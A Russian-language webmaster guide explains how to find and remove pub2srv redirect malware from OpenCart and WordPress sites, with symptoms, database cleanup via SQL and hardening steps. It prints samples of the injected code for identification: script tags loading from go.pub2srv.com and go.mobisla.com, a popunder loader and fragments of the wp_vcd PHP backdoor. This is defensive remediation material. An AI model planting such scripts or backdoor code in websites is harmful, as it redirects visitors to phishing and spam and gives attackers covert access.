Как удалить вирусный скрип с сайта?

фото 5

Наш сайт столкнулся с серьезной проблемой — вирус, который вел пользователей на другую страницу в автоматическом режиме. Редирект с вирусом вел на разные сайты, бывало так, что вас за 1 минуту водит по десяткам сайта, где в конечном итоге вы выиграли миллион, ваш Андройд устател и т.п. Поэтому мы тщательно подошли к вопросу — как удалить вирус и вредоночный код с сайта

В течение нескольких месяцев мы отслеживали зараженность специфическими вредоносными программами, предназначенными для сайтов на OpenCart и WordPress. Обычно это вредоносное ПО pub2srv, которое перенаправляет посетителей вашего сайта на другие вредоносные домены, такие как go.pub2srv.com, go.mobisla.com, go.oclaserver.com и другие.

Что такое вредоносная программа pub2srv?

Это вредоносное ПО, которое заставляет посетителей вашего сайта на OpenCart и WordPress перенаправляться на спам-страницы. На мобильных устройствах всплывающее окно открывается с объявлениями и фишинговыми страницами.

Вредоносная программа pub2srv внедряет вредоносный код JavaScript в источник веб-страницы, вызывая переадресацию / всплывающие окна. В случае с Opencart это вызвано уязвимостями SQL-инъекций в хранилище, что позволяет хакеру добавлять вредоносный код в базу данных. В случае с WordPress хакеры могут модифицировать файл index.php или functions.php, чтобы вставить вредоносный код.

Типичные симптомы сторонней программы сайта:

  • Посетители вашего сайта будут перенаправлять на спам сайты с рекламой, порно, фишинговых страниц
  • Всплывающие окна на мобильных устройствах, предлагающие установить приложения
  • Плагины, полагающиеся на работу AJAX, перестают работать (пример: TablePress, DataTables и т. Д.)
  • Черный список из Google
  • Непризнанный код JavaScript в источнике
  • Когда проверяете сайт на вирусы, видите такой код:

<script type=»text/javascript» src=»//go.pub2srv.com/apu.php?zoneid=1644045″></script> как удалить

Последствия взлома

Поскольку основной причиной этого вредоносного ПО является уязвимость SQL-инъекции (SQLi), злоумышленник может:

  • Добавление, удаление, редактирование или чтение содержимого в базе данных
  • Прочитать исходный код из файлов на сервере базы данных
    Запись файлов на сервер базы данных
  • Украсть пользовательские записи и пароли вашего сайта WordPress / Opencart
  • Кража информации о транзакции в ваших магазинах OpenCart / WooCommerce
  • SEO-спам в своем домене, в результате чего попадете в черный список Google Webmasters

Как удалить код вредоносного кода pub2srv с моего сайта?

В OpenCart вредоносное ПО обычно заражает базу данных и помещает ее код в следующие таблицы базы данных:

oc_product_description table (Product Descriptions)
oc_category_description table (Category Descriptions)

Выполните следующие действия, чтобы удалить вредоносный код из базы данных OpenCart:

Просмотр таблиц базы данных с помощью инструмента, такого как phpMyAdmin или Sequel Pro

Откройте таблицу «oc_category_description» и проверьте значения в столбце «описание».

Вы увидите фрагмент кода JavaScript, как показано ниже:

<script type=»text/javascript»>//<![CDATA[ (function() { var configuration = { «token»: «XXXXXXXXXXXXX», «exitScript»: { «enabled»: true }, «popUnder»: { «enabled»: true } }; var script = document.createElement

(»script»); script.async = true; script.src =

»//cdn.shorte[.st]/link-converter.min.js»; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != »complete» && rs != »loaded») return; shortestMonetization

(configuration);}; var entry = document.getElementsByTagName

(»script»)[0];

entry.parentNode.insertBefore(script, entry);

})(); //]]></script><script data-cfasync=»false» type=»text/javascript» src=»//pXXXXX.clksit[e.com/]

adServe/banners?tid=XXXXX_127XXX_7&tagid=2»></script><script type=»text/javascript» src=»//go.pub2srv.com/apu.php?zoneid=XXXXXX»

</script><script async=»async» type=»text/javascript» src=»//go.mobisla.com/notice.php?p=XXXXXX&interactive=

1&pushup=1″></script>

Выполните следующий фрагмент кода SQL после внесения необходимых замен:

UPDATE oc89gWs_category_description SET description = REPLACE (description, ‘INSERT MALICIOUS CODE FROM PREVIOUS STEP’, »);

Повторите описанный выше шаг для таблицы oc_product_description
В WordPress вредоносное ПО обычно находится в файлах WordPress:фото 2

  • functions.php
  • Database tables
  • index.php

Выполните следующие действия для удаления вредоносного кода WordPress:

Откройте файл index.php (папка public_html) и wp-content / themes / NAME-OF-THEME / functions.php на вашем сервере

Найдите в этих файлах незнакомый / табельный / зашифрованный код. Вы можете найти код, похожий на:

<?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘XXXXXXXXXXXXXXXXXXXXXX’)) { if ( ! function_exists( ‘wp_temp_setup’ ) ) { $path=$_SERVER[‘HTTP_HOST’].

$_SERVER[REQUEST_URI]; ?>

Либо код, который, как правило, хранится в functions.php:

$div_code_name = «wp_vcd»;
$funcfile = FILE;
if(!function_exists

(‘theme_temp_setup’))

{
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

Весь код написать мы не можем, он бывает разный. Такого кода приблизительно несколько десятков строк.

Если вы обнаружите вредоносный код в любом из этих файлов, вы должны заменить файл(ы) из последней известной хорошей резервной копии, либо удалите подозрительный код, а также в папке wp-includes удалите файлы:

  • wp-feed
  • wp-tmp
  • wp-vcd
  • class.wp.phpфото 3Также проверьте таблицы в своей базе данных, как указано в шагах для OpenCart выше.

Шаги, чтобы предотвратить повторное заражение и определить причину

  • Обновите веб-сайт OpenCart / WordPress до последней версии. Чтобы устранить любые известные проблемы безопасности в ядре CMS
  • Блокировать атаки SQL Injection: использовать плагин безопасности, такой как Astra, который активно обнаруживает и блокирует атаки SQL Injection (SQLi), прежде чем они даже достигнут вашего сайта.
  • Измените имя пользователя и пароль учетных записей администратора: чтобы хакер не получал доступ к веб-сайту после очистки вредоносного ПО
  • Изменить пароль базы данных: так, что хакер не может напрямую подключиться к базе данных
  • Изменение ключей шифрования: для предотвращения подмены и других криптографических атак
  • Ограничить доступ к областям администратора только для белых IP-адресов: так, что только авторизированные администраторы могут обращаться к серверной области бэкэнда
  • Удаление неиспользуемых плагинов / расширений: если они больше не поддерживаются, они могут содержать проблемы безопасности, вызывающие взлом в первую очередь
  • Журналы сервера сканирования (доступ и ошибка). В журналах могут появляться незнакомые или тарабарские ошибки, которые могут указывать на источник и время взлома

Что делать, если не удаляется вирус сайта?

Бывает так, что вы сделали всё правильно, но проверка всё равно показывает, что ваш сайт заражен. Причина кроется в соседях. Если ваш сайт не один на сервере, то вирус заражает все сайты, которые есть на вашем сервисе. Поэтому вам необходимо почистить все сайты, которые у вас есть на сервере, если же их слишком много, рекомендуем использовать два сервера. На один сервер переносить сайт, который уже чистый, а на втором очищать.

Также бывает, что у вас вредоносные плагины или тема, которая скачена не с официального сайта. Удалить все подозрительные плагины, поменяйте тему и повторите чистку.